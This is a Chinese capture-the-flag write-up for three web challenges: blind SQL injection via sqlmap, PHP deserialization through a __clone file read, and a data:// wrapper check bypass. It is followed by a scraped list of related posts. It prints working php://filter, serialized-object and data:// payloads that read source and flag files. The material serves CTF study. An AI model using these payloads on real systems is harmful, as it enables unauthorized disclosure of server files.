2023 宁波天一永安杯初赛web部分wp
Query
sql注入,注入点在username,盲注
sqlmap一把梭
Deserialization
先用php的filter伪协议读出h1nt.php的值
payload:
read=php://filter/convert.base64-encode/resource=h1nt.php&input=1
<?php
class test
{public $position;public function __clone(){ echo file_get_contents($this->position); return $this->position;}
}
?>
需要在input这里触发clone函数
<?php
class test
{public $position='php://filter/convert.base64-encode/resource=f14g.php';} $a = new test();
#echo serialize($a);
echo urlencode(serialize($a)) ;?>
read包含h1nt.php,然后input这里传序列后的类
payload:
read=h1nt.php&input=O%3A4%3A%22test%22%3A1%3A%7Bs%3A8%3A%22position%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Df14g.php%22%3B%7D
CodeCheck
先利用data伪协议使a和flag相等,之后c必须是flag,d利用data伪协议读取index.php
payload:
?a=data://text/plain;base64,ZmxhZw%3D%3D&b=data://text/plain;base64,ZmxhZw%3D%3D&c=flag&d=php://filter/convert.base64-encode/resource=index.php
2023 宁波天一永安杯初赛web部分wp相关推荐
- 2021第五届蓝帽杯初赛部分题目wp
文章目录 前言 WEB Ball_sigin PWN slient MISC 冬奥会_is_coming 前言 本次蓝帽杯初赛做出了三道解出人数最多的题,勉强混个线下.但不得不吐槽一下这届题目.冬奥会 ...
- 2023年宁波市网络安全大赛(天一永安杯)-训练赛
2023年宁波市赛-训练赛-MISC 写给新生看的,步骤又乱又多,不喜勿喷,我也不改,爱看不看. welcome 题型:流量分析 首先进行协议分级: 发现TCP协议为主(占78.5%),ARP协议占( ...
- 2022蓝帽杯初赛电子取证
手机取证 1. 627604C2-C586-48C1-AA16-FF33C3022159.PNG图片的分辨率是?[答案格式:19201080] 360360 直接搜索-表格视图 2. 姜总的快递单号 ...
- 2023湖南省“楚怡杯”职业技能大赛“网络安全” 项目比赛任务书
2023湖南省"楚怡杯"职业技能大赛"网络安全" 项目比赛任务书 2023湖南省"楚怡杯"职业技能大赛"网络安全" 项目 ...
- 正式开赛|2023年“桂林银行杯”数据建模大赛暨全国大学生数学建模竞赛广西赛区热身赛
为学习贯彻党的二十大工作报告中关于加快发展数字经济.促进数字经济和实体经济深度融合的重要指示,不断推进数字化转型与金融科技创新,桂林银行联合全国大学生数学建模竞赛广西赛区组委会.广西应用数学中心(广西 ...
- 2022-长城杯初赛Write up-by EchoSec安全团队
2022-长城杯初赛Write up-by EchoSec安全团队 前言 EchoSec安全团队参加的首场比赛,在各位师傅们的输出下,也拿到第8名的成绩,虽然不算特别好,也是EchoSec安全团队迈出 ...
- 纵横杯2020 web wp
title: 纵横杯2020 web wp date: 2020-12-26 18:19:03 tags: CTF categories: 比赛 link:https://yq1ng.github.i ...
- 第十三届蓝桥杯(Web 应用开发)线上模拟赛第一题
[Bug 调试]修复网站显示问题 特别说明 第十三届蓝桥杯(Web 应用开发)线上模拟赛依托于蓝桥云课线上实验环境打造,可能与正式比赛所使用线下环境有所不同.线上模拟赛侧重于考生了解比赛题型和体验比赛 ...
- 第十四届蓝桥杯(Web 应用开发)模拟赛 1 期-职业院校组-知识点题解
这个题解是参考了"海底烧烤店ai"一位非常优秀的全栈领域创作者的博主写的,自己在看的时候发现个人知识点比较欠缺,所以就在题解下面添加了一些知识点,便于理解. 原博主的文章链接如下: ...
最新文章
- python内置库之学习ctypes库(三)--调用Win32API
- 欧盟中止对中国数据卡产品“两反一保”调查
- 五合体机器人乐高_又来一波新品,高达、乐高全都有
- 鸿蒙正式版什么时候上线,终于来了!华为鸿蒙正式版6月2日上线,EMUI时代落幕...
- php缩略图 实例,php生成缩略图后填充白边的代码示例
- bat 判断文件名字含有某些字段_PE文件头及其简单逆向运用
- 用户体验设计5大目标
- Oracle Contracts Core Tables
- 时间复杂度和空间复杂度OvO
- Disconnected: No supported authentication methods available(server sent: publickey) 的解决办法
- 小程序 - 网址大全
- TensorFlow实践(15)——使用tf.device方法指定节点执行设备
- 安装数据库中间件——Mycat
- 红色石头十八岁的天空主题曲铃声 红色石头十八岁的天空主题曲...
- lua和python谁更适用于嵌入MMORPG?
- 2023年千月影视双端app和乐彩V8双端影视源码强制全屏播放用tinyPlayer原生播放器模块
- 计算机主板会自动切断电源是怎么回事,技嘉主板电脑,总自动关机,自动断电,怎么办呀?...
- kkcms前台sql注入漏洞复现
- 信息系统项目管理师-考前辅导指南-1
- python打包的exe如何免杀_使用Python进行防病毒免杀解析